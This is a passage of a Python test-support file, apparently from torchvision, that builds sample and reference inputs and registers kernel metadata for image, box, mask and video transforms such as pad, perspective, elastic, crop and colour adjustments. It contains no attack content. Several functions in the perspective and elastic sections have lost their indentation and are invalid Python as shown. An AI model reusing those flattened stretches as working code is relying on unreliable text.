    left, right, top, bottom = _parse_pad_padding(padding)
    matrix_dtype = "float64" if bounding_boxes.dtype == torch.float64 else "float32"
    # Padding a canvas is a pure translation of the box coordinates.
    affine_matrix = np.array([[1, 0, left], [0, 1, top]], dtype=matrix_dtype)
    new_canvas_size = (canvas_size[0] + top + bottom, canvas_size[1] + left + right)
    expected_bboxes = reference_affine_bounding_boxes_helper(
        bounding_boxes, format=format, canvas_size=new_canvas_size, affine_matrix=affine_matrix
    )
    return expected_bboxes, new_canvas_size
def reference_inputs_pad_bounding_boxes():
    """Constant-mode padding over loaders with no or one extra batch dimension."""
    paddings = [1, (1,), (1, 2), (1, 2, 3, 4), [1], [1, 2], [1, 2, 3, 4]]
    for bbox_loader, padding in itertools.product(
        make_bounding_box_loaders(extra_dims=((), (4,))), paddings
    ):
        yield ArgsKwargs(
            bbox_loader,
            format=bbox_loader.format,
            canvas_size=bbox_loader.canvas_size,
            padding=padding,
            padding_mode="constant",
        )
def pad_xfail_jit_fill_condition(args_kwargs):
    """True for fill values JIT cannot handle: any tuple, or an all-int list."""
    fill = args_kwargs.kwargs.get("fill")
    if isinstance(fill, tuple):
        return True
    if isinstance(fill, list):
        return all(isinstance(component, int) for component in fill)
    return False
# Register the pad kernels (image/bounding boxes/mask/video).
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.pad_image,
            sample_inputs_fn=sample_inputs_pad_image_tensor,
            reference_fn=pil_reference_wrapper(F._pad_image_pil),
            reference_inputs_fn=reference_inputs_pad_image_tensor,
            float32_vs_uint8=float32_vs_uint8_fill_adapter,
            closeness_kwargs=float32_vs_uint8_pixel_difference(),
            test_marks=[
                xfail_jit_python_scalar_arg("padding"),
                xfail_jit(
                    "F.pad only supports vector fills for list of floats", condition=pad_xfail_jit_fill_condition
                ),
            ],
        ),
        KernelInfo(
            F.pad_bounding_boxes,
            sample_inputs_fn=sample_inputs_pad_bounding_boxes,
            reference_fn=reference_pad_bounding_boxes,
            reference_inputs_fn=reference_inputs_pad_bounding_boxes,
            test_marks=[
                xfail_jit_python_scalar_arg("padding"),
            ],
        ),
        KernelInfo(
            F.pad_mask,
            sample_inputs_fn=sample_inputs_pad_mask,
            reference_fn=pil_reference_wrapper(F._pad_image_pil),
            reference_inputs_fn=reference_inputs_pad_mask,
            float32_vs_uint8=float32_vs_uint8_fill_adapter,
        ),
        KernelInfo(
            F.pad_video,
            sample_inputs_fn=sample_inputs_pad_video,
        ),
    ]
)
# Fixed perspective transform coefficient sets, and one startpoints/endpoints
# quadrilateral pair, shared by the perspective sample/reference inputs below.
_PERSPECTIVE_COEFFS = [
    [1.2405, 0.1772, -6.9113, 0.0463, 1.251, -5.235, 0.00013, 0.0018],
    [0.7366, -0.11724, 1.45775, -0.15012, 0.73406, 2.6019, -0.0072, -0.0063],
]
_STARTPOINTS = [[0, 1], [2, 3], [4, 5], [6, 7]]
_ENDPOINTS = [[9, 8], [7, 6], [5, 4], [3, 2]]
def sample_inputs_perspective_image_tensor():
    """Coefficient-based samples per fill value, plus one startpoints/endpoints sample."""
    for img_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE]):
        for fill in get_fills(num_channels=img_loader.num_channels, dtype=img_loader.dtype):
            yield ArgsKwargs(
                img_loader, startpoints=None, endpoints=None, fill=fill, coefficients=_PERSPECTIVE_COEFFS[0]
            )
    yield ArgsKwargs(make_image_loader(), startpoints=_STARTPOINTS, endpoints=_ENDPOINTS)
def reference_inputs_perspective_image_tensor():
    """Images x coefficient sets x interpolation x scalar fills for the PIL reference."""
    modes = [F.InterpolationMode.NEAREST, F.InterpolationMode.BILINEAR]
    for img_loader, coeffs, mode in itertools.product(
        make_image_loaders_for_interpolation(), _PERSPECTIVE_COEFFS, modes
    ):
        for fill in get_fills(num_channels=img_loader.num_channels, dtype=img_loader.dtype):
            # FIXME: PIL kernel doesn't support sequences of length 1 if the number of channels is larger. Shouldn't it?
            if isinstance(fill, (list, tuple)):
                continue
            yield ArgsKwargs(
                img_loader,
                startpoints=None,
                endpoints=None,
                interpolation=mode,
                fill=fill,
                coefficients=coeffs,
            )
def sample_inputs_perspective_bounding_boxes():
for bounding_boxes_loader in make_bounding_box_loaders():
yield ArgsKwargs(
bounding_boxes_loader,
format=bounding_boxes_loader.format,
canvas_size=bounding_boxes_loader.canvas_size,
startpoints=None,
endpoints=None,
coefficients=_PERSPECTIVE_COEFFS[0],
)
format = tv_tensors.BoundingBoxFormat.XYXY
loader = make_bounding_box_loader(format=format)
yield ArgsKwargs(
loader, format=format, canvas_size=loader.canvas_size, startpoints=_STARTPOINTS, endpoints=_ENDPOINTS
)
def sample_inputs_perspective_mask():
for mask_loader in make_mask_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE]):
yield ArgsKwargs(mask_loader, startpoints=None, endpoints=None, coefficients=_PERSPECTIVE_COEFFS[0])
yield ArgsKwargs(make_detection_mask_loader(), startpoints=_STARTPOINTS, endpoints=_ENDPOINTS)
def reference_inputs_perspective_mask():
for mask_loader, perspective_coeffs in itertools.product(
make_mask_loaders(extra_dims=[()], num_objects=[1]), _PERSPECTIVE_COEFFS
):
yield ArgsKwargs(mask_loader, startpoints=None, endpoints=None, coefficients=perspective_coeffs)
def sample_inputs_perspective_video():
for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
yield ArgsKwargs(video_loader, startpoints=None, endpoints=None, coefficients=_PERSPECTIVE_COEFFS[0])
yield ArgsKwargs(make_video_loader(), startpoints=_STARTPOINTS, endpoints=_ENDPOINTS)
# Register the perspective kernels. The image kernel tolerates small differences
# against the PIL reference, across devices, and across dtypes.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.perspective_image,
            sample_inputs_fn=sample_inputs_perspective_image_tensor,
            reference_fn=pil_reference_wrapper(F._perspective_image_pil),
            reference_inputs_fn=reference_inputs_perspective_image_tensor,
            float32_vs_uint8=float32_vs_uint8_fill_adapter,
            closeness_kwargs={
                **pil_reference_pixel_difference(2, mae=True),
                **cuda_vs_cpu_pixel_difference(),
                **float32_vs_uint8_pixel_difference(),
                **scripted_vs_eager_float64_tolerances("cpu", atol=1e-5, rtol=1e-5),
                **scripted_vs_eager_float64_tolerances("cuda", atol=1e-5, rtol=1e-5),
            },
            test_marks=[xfail_jit_python_scalar_arg("fill")],
        ),
        KernelInfo(
            F.perspective_bounding_boxes,
            sample_inputs_fn=sample_inputs_perspective_bounding_boxes,
            closeness_kwargs={
                **scripted_vs_eager_float64_tolerances("cpu", atol=1e-6, rtol=1e-6),
                **scripted_vs_eager_float64_tolerances("cuda", atol=1e-6, rtol=1e-6),
            },
        ),
        KernelInfo(
            F.perspective_mask,
            sample_inputs_fn=sample_inputs_perspective_mask,
            reference_fn=pil_reference_wrapper(F._perspective_image_pil),
            reference_inputs_fn=reference_inputs_perspective_mask,
            float32_vs_uint8=True,
            closeness_kwargs={
                (("TestKernels", "test_against_reference"), torch.uint8, "cpu"): dict(atol=10, rtol=0),
            },
        ),
        KernelInfo(
            F.perspective_video,
            sample_inputs_fn=sample_inputs_perspective_video,
            closeness_kwargs={
                **cuda_vs_cpu_pixel_difference(),
                **scripted_vs_eager_float64_tolerances("cpu", atol=1e-5, rtol=1e-5),
                **scripted_vs_eager_float64_tolerances("cuda", atol=1e-5, rtol=1e-5),
            },
        ),
    ]
)
def _get_elastic_displacement(canvas_size):
return torch.rand(1, *canvas_size, 2)
def sample_inputs_elastic_image_tensor():
    """Sample inputs for F.elastic_image with a random displacement field."""
    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE]):
        displacement = _get_elastic_displacement(image_loader.canvas_size)
        for fill in get_fills(num_channels=image_loader.num_channels, dtype=image_loader.dtype):
            yield ArgsKwargs(image_loader, displacement=displacement, fill=fill)


def reference_inputs_elastic_image_tensor():
    """Inputs exercising every interpolation mode supported by the kernel."""
    for image_loader, interpolation in itertools.product(
        make_image_loaders_for_interpolation(),
        [
            F.InterpolationMode.NEAREST,
            F.InterpolationMode.BILINEAR,
            F.InterpolationMode.BICUBIC,
        ],
    ):
        displacement = _get_elastic_displacement(image_loader.canvas_size)
        for fill in get_fills(num_channels=image_loader.num_channels, dtype=image_loader.dtype):
            yield ArgsKwargs(image_loader, interpolation=interpolation, displacement=displacement, fill=fill)


def sample_inputs_elastic_bounding_boxes():
    """Sample inputs for F.elastic_bounding_boxes."""
    for bounding_boxes_loader in make_bounding_box_loaders():
        displacement = _get_elastic_displacement(bounding_boxes_loader.canvas_size)
        yield ArgsKwargs(
            bounding_boxes_loader,
            format=bounding_boxes_loader.format,
            canvas_size=bounding_boxes_loader.canvas_size,
            displacement=displacement,
        )


def sample_inputs_elastic_mask():
    """Sample inputs for F.elastic_mask."""
    for mask_loader in make_mask_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE]):
        displacement = _get_elastic_displacement(mask_loader.shape[-2:])
        yield ArgsKwargs(mask_loader, displacement=displacement)


def sample_inputs_elastic_video():
    """Sample inputs for F.elastic_video."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        displacement = _get_elastic_displacement(video_loader.shape[-2:])
        yield ArgsKwargs(video_loader, displacement=displacement)
# Register the elastic kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.elastic_image,
            sample_inputs_fn=sample_inputs_elastic_image_tensor,
            reference_inputs_fn=reference_inputs_elastic_image_tensor,
            float32_vs_uint8=float32_vs_uint8_fill_adapter,
            closeness_kwargs={
                **float32_vs_uint8_pixel_difference(6, mae=True),
                **cuda_vs_cpu_pixel_difference(),
            },
            test_marks=[xfail_jit_python_scalar_arg("fill")],
        ),
        KernelInfo(
            F.elastic_bounding_boxes,
            sample_inputs_fn=sample_inputs_elastic_bounding_boxes,
        ),
        KernelInfo(
            F.elastic_mask,
            sample_inputs_fn=sample_inputs_elastic_mask,
        ),
        KernelInfo(
            F.elastic_video,
            sample_inputs_fn=sample_inputs_elastic_video,
            closeness_kwargs=cuda_vs_cpu_pixel_difference(),
        ),
    ]
)
# Canvas sizes and output sizes exercised by the center-crop reference tests.
_CENTER_CROP_SPATIAL_SIZES = [(16, 16), (7, 33), (31, 9)]
_CENTER_CROP_OUTPUT_SIZES = [[4, 3], [42, 70], [4], 3, (5, 2), (6,)]


def sample_inputs_center_crop_image_tensor():
    """Sample inputs for F.center_crop_image."""
    for image_loader, output_size in itertools.product(
        make_image_loaders(sizes=[(16, 17)], color_spaces=["RGB"], dtypes=[torch.float32]),
        [
            # valid `output_size` types for which cropping is applied to both dimensions
            *[5, (4,), (2, 3), [6], [3, 2]],
            # `output_size`'s for which at least one dimension needs to be padded
            *[[4, 18], [17, 5], [17, 18]],
        ],
    ):
        yield ArgsKwargs(image_loader, output_size=output_size)


def reference_inputs_center_crop_image_tensor():
    """Inputs for comparing against the PIL center-crop reference."""
    for image_loader, output_size in itertools.product(
        make_image_loaders(sizes=_CENTER_CROP_SPATIAL_SIZES, extra_dims=[()], dtypes=[torch.uint8]),
        _CENTER_CROP_OUTPUT_SIZES,
    ):
        yield ArgsKwargs(image_loader, output_size=output_size)


def sample_inputs_center_crop_bounding_boxes():
    """Sample inputs for F.center_crop_bounding_boxes."""
    for bounding_boxes_loader, output_size in itertools.product(make_bounding_box_loaders(), _CENTER_CROP_OUTPUT_SIZES):
        yield ArgsKwargs(
            bounding_boxes_loader,
            format=bounding_boxes_loader.format,
            canvas_size=bounding_boxes_loader.canvas_size,
            output_size=output_size,
        )


def sample_inputs_center_crop_mask():
    """Sample inputs for F.center_crop_mask (crops to half the mask size)."""
    for mask_loader in make_mask_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_categories=[10], num_objects=[5]):
        height, width = mask_loader.shape[-2:]
        yield ArgsKwargs(mask_loader, output_size=(height // 2, width // 2))


def reference_inputs_center_crop_mask():
    """Inputs for comparing the mask kernel against the PIL reference."""
    for mask_loader, output_size in itertools.product(
        make_mask_loaders(sizes=_CENTER_CROP_SPATIAL_SIZES, extra_dims=[()], num_objects=[1]), _CENTER_CROP_OUTPUT_SIZES
    ):
        yield ArgsKwargs(mask_loader, output_size=output_size)


def sample_inputs_center_crop_video():
    """Sample inputs for F.center_crop_video (crops to half the frame size)."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        height, width = video_loader.shape[-2:]
        yield ArgsKwargs(video_loader, output_size=(height // 2, width // 2))
# Register the center-crop kernels. JIT rejects scalar ``output_size`` arguments.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.center_crop_image,
            sample_inputs_fn=sample_inputs_center_crop_image_tensor,
            reference_fn=pil_reference_wrapper(F._center_crop_image_pil),
            reference_inputs_fn=reference_inputs_center_crop_image_tensor,
            float32_vs_uint8=True,
            test_marks=[
                xfail_jit_python_scalar_arg("output_size"),
            ],
        ),
        KernelInfo(
            F.center_crop_bounding_boxes,
            sample_inputs_fn=sample_inputs_center_crop_bounding_boxes,
            test_marks=[
                xfail_jit_python_scalar_arg("output_size"),
            ],
        ),
        KernelInfo(
            F.center_crop_mask,
            sample_inputs_fn=sample_inputs_center_crop_mask,
            reference_fn=pil_reference_wrapper(F._center_crop_image_pil),
            reference_inputs_fn=reference_inputs_center_crop_mask,
            float32_vs_uint8=True,
            test_marks=[
                xfail_jit_python_scalar_arg("output_size"),
            ],
        ),
        KernelInfo(
            F.center_crop_video,
            sample_inputs_fn=sample_inputs_center_crop_video,
        ),
    ]
)
def sample_inputs_gaussian_blur_image_tensor():
    """Sample inputs for F.gaussian_blur_image: scalar/tuple/list kernel sizes and sigmas."""
    make_gaussian_blur_image_loaders = functools.partial(make_image_loaders, sizes=[(7, 33)], color_spaces=["RGB"])

    for image_loader, kernel_size in itertools.product(make_gaussian_blur_image_loaders(), [5, (3, 3), [3, 3]]):
        yield ArgsKwargs(image_loader, kernel_size=kernel_size)

    for image_loader, sigma in itertools.product(
        make_gaussian_blur_image_loaders(), [None, (3.0, 3.0), [2.0, 2.0], 4.0, [1.5], (3.14,)]
    ):
        yield ArgsKwargs(image_loader, kernel_size=5, sigma=sigma)


def sample_inputs_gaussian_blur_video():
    """Sample inputs for F.gaussian_blur_video."""
    for video_loader in make_video_loaders(sizes=[(7, 33)], num_frames=[5]):
        yield ArgsKwargs(video_loader, kernel_size=[3, 3])


# Register the gaussian-blur kernels. JIT rejects scalar kernel_size/sigma.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.gaussian_blur_image,
            sample_inputs_fn=sample_inputs_gaussian_blur_image_tensor,
            closeness_kwargs=cuda_vs_cpu_pixel_difference(),
            test_marks=[
                xfail_jit_python_scalar_arg("kernel_size"),
                xfail_jit_python_scalar_arg("sigma"),
            ],
        ),
        KernelInfo(
            F.gaussian_blur_video,
            sample_inputs_fn=sample_inputs_gaussian_blur_video,
            closeness_kwargs=cuda_vs_cpu_pixel_difference(),
        ),
    ]
)
def sample_inputs_equalize_image_tensor():
    """Sample inputs for F.equalize_image."""
    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
        yield ArgsKwargs(image_loader)


def reference_inputs_equalize_image_tensor():
    """Inputs with deliberately non-uniform value distributions for the PIL comparison."""
    # We are not using `make_image_loaders` here since that uniformly samples the values over the whole value range.
    # Since the whole point of this kernel is to transform an arbitrary distribution of values into a uniform one,
    # the information gain is low if we already provide something really close to the expected value.
    def make_uniform_band_image(shape, dtype, device, *, low_factor, high_factor, memory_format):
        # Values uniformly distributed inside [low_factor, high_factor] of the dtype's range.
        if dtype.is_floating_point:
            low = low_factor
            high = high_factor
        else:
            max_value = torch.iinfo(dtype).max
            low = int(low_factor * max_value)
            high = int(high_factor * max_value)
        return torch.testing.make_tensor(shape, dtype=dtype, device=device, low=low, high=high).to(
            memory_format=memory_format, copy=True
        )

    def make_beta_distributed_image(shape, dtype, device, *, alpha, beta, memory_format):
        # Values following a Beta(alpha, beta) distribution, scaled to the dtype's range.
        image = torch.distributions.Beta(alpha, beta).sample(shape)
        if not dtype.is_floating_point:
            image.mul_(torch.iinfo(dtype).max).round_()
        return image.to(dtype=dtype, device=device, memory_format=memory_format, copy=True)

    canvas_size = (256, 256)
    for dtype, color_space, fn in itertools.product(
        [torch.uint8],
        ["GRAY", "RGB"],
        [
            # degenerate histograms: all-zero and all-max images
            lambda shape, dtype, device, memory_format: torch.zeros(shape, dtype=dtype, device=device).to(
                memory_format=memory_format, copy=True
            ),
            lambda shape, dtype, device, memory_format: torch.full(
                shape, 1.0 if dtype.is_floating_point else torch.iinfo(dtype).max, dtype=dtype, device=device
            ).to(memory_format=memory_format, copy=True),
            *[
                functools.partial(make_uniform_band_image, low_factor=low_factor, high_factor=high_factor)
                for low_factor, high_factor in [
                    (0.0, 0.25),
                    (0.25, 0.75),
                    (0.75, 1.0),
                ]
            ],
            *[
                functools.partial(make_beta_distributed_image, alpha=alpha, beta=beta)
                for alpha, beta in [
                    (0.5, 0.5),
                    (2, 2),
                    (2, 5),
                    (5, 2),
                ]
            ],
        ],
    ):
        image_loader = ImageLoader(fn, shape=(get_num_channels(color_space), *canvas_size), dtype=dtype)
        yield ArgsKwargs(image_loader)


def sample_inputs_equalize_video():
    """Sample inputs for F.equalize_video."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader)


# Register the equalize kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.equalize_image,
            kernel_name="equalize_image_tensor",
            sample_inputs_fn=sample_inputs_equalize_image_tensor,
            reference_fn=pil_reference_wrapper(F._equalize_image_pil),
            float32_vs_uint8=True,
            reference_inputs_fn=reference_inputs_equalize_image_tensor,
        ),
        KernelInfo(
            F.equalize_video,
            sample_inputs_fn=sample_inputs_equalize_video,
        ),
    ]
)
def sample_inputs_invert_image_tensor():
    """Sample inputs for F.invert_image."""
    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
        yield ArgsKwargs(image_loader)


def reference_inputs_invert_image_tensor():
    """Inputs for comparing against the PIL invert reference."""
    for image_loader in make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]):
        yield ArgsKwargs(image_loader)


def sample_inputs_invert_video():
    """Sample inputs for F.invert_video."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader)


# Register the invert kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.invert_image,
            kernel_name="invert_image_tensor",
            sample_inputs_fn=sample_inputs_invert_image_tensor,
            reference_fn=pil_reference_wrapper(F._invert_image_pil),
            reference_inputs_fn=reference_inputs_invert_image_tensor,
            float32_vs_uint8=True,
        ),
        KernelInfo(
            F.invert_video,
            sample_inputs_fn=sample_inputs_invert_video,
        ),
    ]
)
# Bit depths exercised by the posterize tests.
_POSTERIZE_BITS = [1, 4, 8]


def sample_inputs_posterize_image_tensor():
    """Sample inputs for F.posterize_image."""
    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
        yield ArgsKwargs(image_loader, bits=_POSTERIZE_BITS[0])


def reference_inputs_posterize_image_tensor():
    """Inputs exercising every bit depth against the PIL reference."""
    for image_loader, bits in itertools.product(
        make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
        _POSTERIZE_BITS,
    ):
        yield ArgsKwargs(image_loader, bits=bits)


def sample_inputs_posterize_video():
    """Sample inputs for F.posterize_video."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader, bits=_POSTERIZE_BITS[0])


# Register the posterize kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.posterize_image,
            kernel_name="posterize_image_tensor",
            sample_inputs_fn=sample_inputs_posterize_image_tensor,
            reference_fn=pil_reference_wrapper(F._posterize_image_pil),
            reference_inputs_fn=reference_inputs_posterize_image_tensor,
            float32_vs_uint8=True,
            closeness_kwargs=float32_vs_uint8_pixel_difference(),
        ),
        KernelInfo(
            F.posterize_video,
            sample_inputs_fn=sample_inputs_posterize_video,
        ),
    ]
)
def _get_solarize_thresholds(dtype):
    """Yield solarize thresholds at 10% and 50% of *dtype*'s maximum value.

    Floating-point dtypes get float thresholds, integer dtypes get ints.
    """
    # get_max_value(dtype) is loop-invariant, so compute it (and the converter) once.
    max_value = get_max_value(dtype)
    to_threshold = float if dtype.is_floating_point else int
    for factor in [0.1, 0.5]:
        yield to_threshold(max_value * factor)
def sample_inputs_solarize_image_tensor():
    """Sample inputs for F.solarize_image (first threshold only)."""
    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
        yield ArgsKwargs(image_loader, threshold=next(_get_solarize_thresholds(image_loader.dtype)))


def reference_inputs_solarize_image_tensor():
    """Inputs exercising every threshold against the PIL reference."""
    for image_loader in make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]):
        for threshold in _get_solarize_thresholds(image_loader.dtype):
            yield ArgsKwargs(image_loader, threshold=threshold)
def uint8_to_float32_threshold_adapter(other_args, kwargs):
    """Rescale a uint8 threshold kwarg to the float32 value range [0, 1]."""
    scaled_threshold = kwargs["threshold"] / 255
    return other_args, {"threshold": scaled_threshold}
def sample_inputs_solarize_video():
    """Sample inputs for F.solarize_video (first threshold only)."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader, threshold=next(_get_solarize_thresholds(video_loader.dtype)))


# Register the solarize kernels. The uint8->float32 comparison rescales the threshold.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.solarize_image,
            kernel_name="solarize_image_tensor",
            sample_inputs_fn=sample_inputs_solarize_image_tensor,
            reference_fn=pil_reference_wrapper(F._solarize_image_pil),
            reference_inputs_fn=reference_inputs_solarize_image_tensor,
            float32_vs_uint8=uint8_to_float32_threshold_adapter,
            closeness_kwargs=float32_vs_uint8_pixel_difference(),
        ),
        KernelInfo(
            F.solarize_video,
            sample_inputs_fn=sample_inputs_solarize_video,
        ),
    ]
)
def sample_inputs_autocontrast_image_tensor():
    """Sample inputs for F.autocontrast_image."""
    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
        yield ArgsKwargs(image_loader)


def reference_inputs_autocontrast_image_tensor():
    """Inputs for comparing against the PIL autocontrast reference."""
    for image_loader in make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]):
        yield ArgsKwargs(image_loader)


def sample_inputs_autocontrast_video():
    """Sample inputs for F.autocontrast_video."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader)


# Register the autocontrast kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.autocontrast_image,
            kernel_name="autocontrast_image_tensor",
            sample_inputs_fn=sample_inputs_autocontrast_image_tensor,
            reference_fn=pil_reference_wrapper(F._autocontrast_image_pil),
            reference_inputs_fn=reference_inputs_autocontrast_image_tensor,
            float32_vs_uint8=True,
            closeness_kwargs={
                **pil_reference_pixel_difference(),
                **float32_vs_uint8_pixel_difference(),
            },
        ),
        KernelInfo(
            F.autocontrast_video,
            sample_inputs_fn=sample_inputs_autocontrast_video,
        ),
    ]
)
# Sharpness factors exercised by the tests.
_ADJUST_SHARPNESS_FACTORS = [0.1, 0.5]


def sample_inputs_adjust_sharpness_image_tensor():
    """Sample inputs for F.adjust_sharpness_image, including a tiny (2, 2) image."""
    for image_loader in make_image_loaders(
        sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE, (2, 2)],
        color_spaces=("GRAY", "RGB"),
    ):
        yield ArgsKwargs(image_loader, sharpness_factor=_ADJUST_SHARPNESS_FACTORS[0])


def reference_inputs_adjust_sharpness_image_tensor():
    """Inputs exercising every sharpness factor against the PIL reference."""
    for image_loader, sharpness_factor in itertools.product(
        make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
        _ADJUST_SHARPNESS_FACTORS,
    ):
        yield ArgsKwargs(image_loader, sharpness_factor=sharpness_factor)


def sample_inputs_adjust_sharpness_video():
    """Sample inputs for F.adjust_sharpness_video."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader, sharpness_factor=_ADJUST_SHARPNESS_FACTORS[0])


# Register the adjust-sharpness kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.adjust_sharpness_image,
            kernel_name="adjust_sharpness_image_tensor",
            sample_inputs_fn=sample_inputs_adjust_sharpness_image_tensor,
            reference_fn=pil_reference_wrapper(F._adjust_sharpness_image_pil),
            reference_inputs_fn=reference_inputs_adjust_sharpness_image_tensor,
            float32_vs_uint8=True,
            closeness_kwargs=float32_vs_uint8_pixel_difference(2),
        ),
        KernelInfo(
            F.adjust_sharpness_video,
            sample_inputs_fn=sample_inputs_adjust_sharpness_video,
        ),
    ]
)
# Contrast factors exercised by the tests.
_ADJUST_CONTRAST_FACTORS = [0.1, 0.5]


def sample_inputs_adjust_contrast_image_tensor():
    """Sample inputs for F.adjust_contrast_image."""
    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
        yield ArgsKwargs(image_loader, contrast_factor=_ADJUST_CONTRAST_FACTORS[0])


def reference_inputs_adjust_contrast_image_tensor():
    """Inputs exercising every contrast factor against the PIL reference."""
    for image_loader, contrast_factor in itertools.product(
        make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
        _ADJUST_CONTRAST_FACTORS,
    ):
        yield ArgsKwargs(image_loader, contrast_factor=contrast_factor)


def sample_inputs_adjust_contrast_video():
    """Sample inputs for F.adjust_contrast_video."""
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader, contrast_factor=_ADJUST_CONTRAST_FACTORS[0])


# Register the adjust-contrast kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.adjust_contrast_image,
            kernel_name="adjust_contrast_image_tensor",
            sample_inputs_fn=sample_inputs_adjust_contrast_image_tensor,
            reference_fn=pil_reference_wrapper(F._adjust_contrast_image_pil),
            reference_inputs_fn=reference_inputs_adjust_contrast_image_tensor,
            float32_vs_uint8=True,
            closeness_kwargs={
                **pil_reference_pixel_difference(),
                **float32_vs_uint8_pixel_difference(2),
                **cuda_vs_cpu_pixel_difference(),
                (("TestKernels", "test_against_reference"), torch.uint8, "cpu"): pixel_difference_closeness_kwargs(1),
            },
        ),
        KernelInfo(
            F.adjust_contrast_video,
            sample_inputs_fn=sample_inputs_adjust_contrast_video,
            closeness_kwargs={
                **cuda_vs_cpu_pixel_difference(),
                (("TestKernels", "test_against_reference"), torch.uint8, "cpu"): pixel_difference_closeness_kwargs(1),
            },
        ),
    ]
)
# (gamma, gain) pairs exercised by the tests.
_ADJUST_GAMMA_GAMMAS_GAINS = [
    (0.5, 2.0),
    (0.0, 1.0),
]


def sample_inputs_adjust_gamma_image_tensor():
    """Sample inputs for F.adjust_gamma_image (first gamma/gain pair only)."""
    gamma, gain = _ADJUST_GAMMA_GAMMAS_GAINS[0]
    for image_loader in make_image_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], color_spaces=("GRAY", "RGB")):
        yield ArgsKwargs(image_loader, gamma=gamma, gain=gain)


def reference_inputs_adjust_gamma_image_tensor():
    """Inputs exercising every gamma/gain pair against the PIL reference."""
    for image_loader, (gamma, gain) in itertools.product(
        make_image_loaders(color_spaces=("GRAY", "RGB"), extra_dims=[()], dtypes=[torch.uint8]),
        _ADJUST_GAMMA_GAMMAS_GAINS,
    ):
        yield ArgsKwargs(image_loader, gamma=gamma, gain=gain)


def sample_inputs_adjust_gamma_video():
    """Sample inputs for F.adjust_gamma_video (first gamma/gain pair only)."""
    gamma, gain = _ADJUST_GAMMA_GAMMAS_GAINS[0]
    for video_loader in make_video_loaders(sizes=[DEFAULT_PORTRAIT_SPATIAL_SIZE], num_frames=[3]):
        yield ArgsKwargs(video_loader, gamma=gamma, gain=gain)


# Register the adjust-gamma kernels.
KERNEL_INFOS.extend(
    [
        KernelInfo(
            F.adjust_gamma_image,
            kernel_name="adjust_gamma_image_tensor",
            sample_inputs_fn=sample_inputs_adjust_gamma_image_tensor,
            reference_fn=pil_reference_wrapper(F._adjust_gamma_image_pil),
            reference_inputs_fn=reference_inputs_adjust_gamma_image_tensor,
            float32_vs_uint8=True,
            closeness_kwargs={
                **pil_reference_pixel_difference(),
                **float32_vs_uint8_pixel_difference(),
            },
        ),
        KernelInfo(
            F.adjust_gamma_video,
            sample_inputs_fn=sample_inputs_adjust_gamma_video,
        ),
    ]
)
# Hue factors exercised by the tests (valid range is [-0.5, 0.5]).
_ADJUST_HUE_FACTORS = [-0.1, 0.5]


def sample_inputs_adjust_hue_image_tensor():
    """Sample inputs for F.adjust_hue_image."""
